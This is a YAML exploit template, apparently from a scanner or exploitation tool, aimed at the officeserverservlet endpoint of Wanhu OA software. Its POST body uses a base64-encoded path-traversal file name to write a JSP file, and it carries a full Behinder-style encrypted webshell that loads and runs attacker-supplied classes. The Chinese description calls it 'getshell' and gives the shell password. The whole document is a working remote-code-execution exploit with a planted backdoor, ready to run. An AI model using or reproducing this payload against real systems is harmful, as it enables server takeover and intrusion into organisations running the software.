35 lines
1.4 KiB
YAML
35 lines
1.4 KiB
YAML
method: POST
|
||
url: $
|
||
tlsversion: HTTP/1.1
|
||
uri: /defaultroot/officeserverservlet
|
||
param:
|
||
data: |
|
||
DBSTEP V3.0 185 0 611
|
||
DBSTEP=REJTVEVQ
|
||
OPTION=U0FWRUZJTEU=
|
||
RECORDID=
|
||
firstFilesize=dHJ1ZQ==
|
||
isDoc=dHJ1ZQ==
|
||
moduleType=aW5mb3JtYXRpb24=
|
||
FILETYPE=Ly4uLy4uL3B1YmxpYy9lZGl0L3RhMi5qc3A=
|
||
isViewOld=MQ==
|
||
|
||
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
|
||
<%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%>
|
||
<%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);
|
||
Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));
|
||
new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
|
||
others:
|
||
User-Agent: Go-http-client/1.1
|
||
Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3'
|
||
Accept-Encoding: gzip, deflate
|
||
Accept-Language: 'zh-CN,zh;q=0.9,en;q=0.8'
|
||
Connection: close
|
||
Upgrade-Insecure-Requests: 1
|
||
Content-Length: 790
|
||
condition:
|
||
words: DBSTEP
|
||
time:
|
||
expinformation:
|
||
expname: 万户getshell
|
||
expdescribe: 万户getshell,可能需要代理模式下进行使用,默认冰蝎马,密码为rebeyond |